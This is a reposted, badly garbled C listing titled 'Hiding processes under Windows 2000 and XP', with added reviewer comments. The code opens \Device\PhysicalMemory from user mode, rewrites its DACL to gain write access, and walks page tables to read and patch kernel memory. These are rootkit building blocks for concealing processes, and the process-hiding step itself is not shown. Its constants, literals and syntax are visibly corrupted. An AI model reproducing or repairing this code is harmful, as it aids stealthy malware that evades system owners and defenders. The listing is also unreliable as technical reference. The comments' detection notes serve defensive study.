Hiding processes under Windows 2000 and XP (tested with VC6.0)

xiaoxiao2021-03-05  26

// Reviewer note: this listing was collapsed onto a handful of very long lines
// when it was reposted. The "#include <...>" targets, the NT_SUCCESS macro body,
// several hex masks and the object-path literal no longer survive as written,
// and every "//" separator now comments out the code that follows it on the
// same physical line. Read it as a historical sample for study; it is not
// buildable source in this form.
//
// Technique, for detection/mitigation context: the program opens the
// \Device\PhysicalMemory section object from user mode on Windows 2000 / XP
// (32-bit x86) and maps pieces of physical RAM to read and patch kernel data.
// As far as I recall, later Windows releases stopped exposing that section to
// user mode; on systems where it is reachable, an open of that object -- and in
// particular a DACL rewrite on it, which SetPhyscialMemorySectionCanBeWrited
// performs below -- is a strong indicator worth alerting on.
//
// Declarations: NTSTATUS, IO_STATUS_BLOCK, UNICODE_STRING and OBJECT_ATTRIBUTES
// are redeclared locally (the Win32 SDK of the day did not ship them);
// ZwOpenSection and RtlInitUnicodeString are resolved from ntdll.dll at run time
// with GetProcAddress (InitNtDll). g_hMPM holds the section handle and
// g_pMapPhysicalMemory the 4 KiB view that OpenPhysicalMemory maps at the
// hard-coded "PhyDirectory" offset.
//// Hide Process # include #include #define nt_success (status) (status) (status) (status) (status)> = 0) #define status_info_length_mismch ((NTSTATUS) ) 0xC0000004L) #define STATUS_ACCESS_DENIED ((NTSTATUS) 0xC0000022L) typedef LONG NTSTATUS; typedef struct _IO_STATUS_BLOCK {NTSTATUS Status; ULONG Information;} IO_STATUS_BLOCK, * PIO_STATUS_BLOCK; typedef struct _UNICODE_STRING {USHORT Length; USHORT MaximumLength; PWSTR Buffer;} UNICODE_STRING, * PUNICODE_STRING ; #define OBJ_INHERIT 0x00000002L # define OBJ_PERMANENT 0x00000010L # define OBJ_EXCLUSIVE 0x00000020L # define OBJ_CASE_INSENSITIVE 0x00000040L # define OBJ_OPENIF 0x00000080L # define OBJ_OPENLINK 0x00000100L # define OBJ_KERNEL_HANDLE 0x00000200L # define OBJ_VALID_ATTRIBUTES 0x000003F2Ltypedef struct _OBJECT_ATTRIBUTES {ULONG Length; HANDLE RootDirectory; PUNICODE_STRING ObjectName; ULONG Attributes; PVOID SecurityDescri ptor; PVOID SecurityQualityOfService;} OBJECT_ATTRIBUTES, * POBJECT_ATTRIBUTES; typedef NTSTATUS (CALLBACK * ZWOPENSECTION) (OUT PHANDLE SectionHandle, IN ACCESS_MASK DesiredAccess, IN POBJECT_ATTRIBUTES ObjectAttributes); typedef VOID (CALLBACK * RTLINITUNICODESTRING) (IN OUT PUNICODE_STRING DestinationString, IN PCWSTR SourceString); RTLINITUNICODESTRING RtlInitUnicodeString; ZWOPENSECTION ZwOpenSection; HMODULE g_hNtDLL = NULL; PVOID g_pMapPhysicalMemory = NULL; HANDLE g_hMPM = NULL; OSVERSIONINFO g_osvi; // ------------------------ -------------------------------------------------- -Bool initntdll () {g_hntdll = loadingLibrary ("ntdll.dll"); if (null ==

// InitNtDll (continued): returns FALSE when ntdll.dll cannot be loaded. The
// two GetProcAddress results are not NULL-checked, so a missing export would
// only show up later as a call through a NULL function pointer.
//
// CloseNtDll: releases the module handle and resets g_hNtDLL.
//
// SetPhyscialMemorySectionCanBeWrited(hSection): reads the section's current
// DACL with GetSecurityInfo, builds one EXPLICIT_ACCESS entry granting
// SECTION_MAP_WRITE to the "CURRENT_USER" trustee, merges it with
// SetEntriesInAcl and writes the result back with SetSecurityInfo.
// Defects visible as written: each error branch frees pSD/pNewDacl and then
// falls through into the next API call instead of returning, and on the
// success path neither pSD nor pNewDacl is ever LocalFree'd. The function is
// VOID, so its caller cannot tell whether the DACL change took effect and
// simply retries the open. A DACL rewrite on a kernel section object is the
// kind of event object-access auditing (a SACL on the object) exists to
// surface. The function's closing braces are on the next code line.
g_hNtDLL) return FALSE; RtlInitUnicodeString = (RTLINITUNICODESTRING) GetProcAddress (g_hNtDLL, "RtlInitUnicodeString"); ZwOpenSection = (ZWOPENSECTION) GetProcAddress (g_hNtDLL, "ZwOpenSection"); return TRUE;} // ----------- -------------------------------------------------- -------------- Void Closentdll () {if (null! = G_hntdll) Freelibrary (g_hntdll); g_hntdll = null;} // ------------ -------------------------------------------------- ------------- VOID SetPhyscialMemorySectionCanBeWrited (HANDLE hSection) {PACL pDacl = NULL; PSECURITY_DESCRIPTOR pSD = NULL; PACL pNewDacl = NULL; DWORD dwRes = GetSecurityInfo (hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, NULL, NULL, & pDacl, NULL, & pSD); if (! ERROR_SUCCESS = dwRes) {if (pSD) LocalFree (pSD); if (pNewDacl) LocalFree (pNewDacl);} EXPLICIT_ACCESS ea; RtlZeroMemory (& ea, sizeof (EXPLICIT_ACCESS)); ea.grfAccessPermissions = Section_map _WRITE; ea.grfAccessMode = GRANT_ACCESS; ea.grfInheritance = NO_INHERITANCE; ea.Trustee.TrusteeForm = TRUSTEE_IS_NAME; ea.Trustee.TrusteeType = TRUSTEE_IS_USER; ea.Trustee.ptstrName = "CURRENT_USER"; dwRes = SetEntriesInAcl (1, & ea, pDacl, & pNewDacl); if (ERROR_SUCCESS = dwRes)! {if (pSD) LocalFree (pSD); if (pNewDacl) LocalFree (pNewDacl);} dwRes = SetSecurityInfo (hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, NULL, NULL, pNewDacl, NULL); if (ERROR_SUCCESS! = Dwres) {if (psd) localfree (PSD); if (PNEWDACL) LocalFree (PNEWDACL);

// (end of SetPhyscialMemorySectionCanBeWrited)
//
// OpenPhysicalMemory: only Windows major version 5 is accepted; minor version
// 0 ("2k") and 1 ("xp") select a hard-coded physical address (0x30000 /
// 0x39000) that the rest of the code treats as the kernel page directory
// (LinearToPhys indexes the mapped view with the top 10 address bits). This is a
// build-specific assumption, not something derived from the running system.
// The section is opened through ZwOpenSection with SECTION_MAP_READ |
// SECTION_MAP_WRITE; on STATUS_ACCESS_DENIED it is reopened with READ_CONTROL |
// WRITE_DAC, the DACL is rewritten (see above), the handle is closed and the
// original open is retried. The status of the READ_CONTROL | WRITE_DAC open is
// overwritten without being checked. On success a 4 KiB view at PhyDirectory
// is mapped into g_pMapPhysicalMemory and the section handle is returned.
// Transcription damage on this line: the object-path literal has lost its
// backslashes ("// Device // PhysicalMemory") and `attributes.Attributes = 0`
// is missing its terminating ';'. The function's closing brace is on the next
// code line.
}} // ---------------------------------------------- ----------------------------- HANDLE OpenPhysicalMemory () {NTSTATUS status; UNICODE_STRING physmemString; OBJECT_ATTRIBUTES attributes; ULONG PhyDirectory; g_osvi.dwOSVersionInfoSize = sizeof (OSVERSIONINFO); GetVersionEx (& g_osvi); if (5 = g_osvi.dwMajorVersion!) return NULL; switch (g_osvi.dwMinorVersion) {case 0: PhyDirectory = 0x30000; break; // 2k case 1: PhyDirectory = 0x39000; break; // xp default: return NULL;} RtlInitUnicodeString (& physmemString, L "// Device // PhysicalMemory"); attributes.Length = sizeof (OBJECT_ATTRIBUTES); attributes.RootDirectory = NULL; attributes.ObjectName = & physmemString; attributes.Attributes = 0 Attributes.securityDescriptor = null; attributes.securityqualityofservice = null; status = zwopensection (& g_ hMPM, SECTION_MAP_READ | SECTION_MAP_WRITE, & attributes); if (status == STATUS_ACCESS_DENIED) {status = ZwOpenSection (& g_hMPM, READ_CONTROL | WRITE_DAC, & attributes); SetPhyscialMemorySectionCanBeWrited (g_hMPM); CloseHandle (g_hMPM); status = ZwOpenSection (& g_hMPM, SECTION_MAP_READ | SECTION_MAP_WRITE, & attributes);} if (! NT_SUCCESS (status)) return NULL; g_pMapPhysicalMemory = MapViewOfFile (g_hMPM, FILE_MAP_READ | FILE_MAP_WRITE, 0, PhyDirectory, 0x1000); if (g_pMapPhysicalMemory == NULL) return NULL; return g_hMPM;

// (closing brace of OpenPhysicalMemory)
//
// LinearToPhys(baseaddress, addr): software page walk for 32-bit x86 without
// PAE. The top 10 bits of the virtual address index the page directory
// (VADDR >> 22), the next 10 bits index the page table
// ((VADDR & 0x003FF000) >> 12), and bit 7 of the directory entry (PGDE & 0x80)
// selects the large-page branch. The page table is reached by mapping a second
// 4 KiB view of the section at the frame address taken from the PDE; the bare
// `4` passed as desired access is presumably FILE_MAP_READ (value 4) -- confirm.
// A non-present entry (bit 0 clear) yields 0. Several masks on this line
// ("0xFFFC00000", "0xffff000", "0xFFFFFFFFFFFFFF") do not fit a 32-bit ULONG and
// are clearly corrupted in this copy; do not read them as the original
// constants.
//
// GetData(addr) / SetData(addr, data): translate addr with LinearToPhys, map
// the 4 KiB frame containing it (phys & 0xfffff000) and read or write the
// DWORD at index (phys & 0xFFF) >> 2 before unmapping. Neither function checks
// the 0 that LinearToPhys returns for a non-present page, so a failed
// translation silently reads or writes physical frame 0. `ulong return = ...`
// in GetData uses a keyword as an identifier -- another transcription error.
// SetData's closing brace, and whatever followed it in the original program,
// lies beyond the end of this listing.
} // ----------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------- pvoid lineartophys (pulong baseaddress, pvoid addr) {ulong vaddr = (ulong) Addr, pgde, PTE, Paddr; pgde = baseaddress [VADDR >> 22]; if (0 == (PGDE & 1)) Return 0; Ulong TMP = PGDE & 0x00000080; IF (0! = TMP) {Paddr = (PGDE & 0xFFFC00000) (VADDR & 0xFFFC00000) 0x003FFFFF);} else {pgde = (ulong) MapViewOffile (g_hmpm, 4, 0, pgde & 0xffff000, 0x1000); PTE = ((pulong) PGDE) [(VADDR & 0x003FF000) >> 12]; if (0 == (PTE & 1 )) RETURN 0; PADDR = (PTE & 0xFFFFFFFFFFFFFF); unmapViewoffile ((pvoid) pgde);} return (pvoid) Paddr;} // --------------- -------------------------------------------------- -------- ULONG GetData (PVOID addr) {ULONG phys = (ULONG) LinearToPhys ((PULONG) g_pMapPhysicalMemory, (PVOID) addr); PULONG tmp = (PULONG) MapViewOfFile (g_hMPM, FILE_MAP_READ | FILE_MAP_WRITE, 0, Phys & 0xfffff000, 0x1000); if (0 == TMP) Return 0; ulong return = TMP [(Phys & 0xFFF) >> 2]; unmapViewoffile (TMP); return ret;} // -------------------- -------------------------------------------------- ---- BOOL SetData (PVOID addr, ULONG data) {ULONG phys = (ULONG) LinearToPhys ((PULONG) g_pMapPhysicalMemory, (PVOID) addr); PULONG tmp = (PULONG) MapViewOfFile (g_hMPM, FILE_MAP_WRITE, 0, phys & 0xfffff000 0x1000); if (0 == TMP) Return False; TMP [(PHYS & 0xFFF) >> 2] = data; unmapViewoffile (TMP); Return True;

转载请注明原文地址:https://www.9cbs.com/read-36181.html
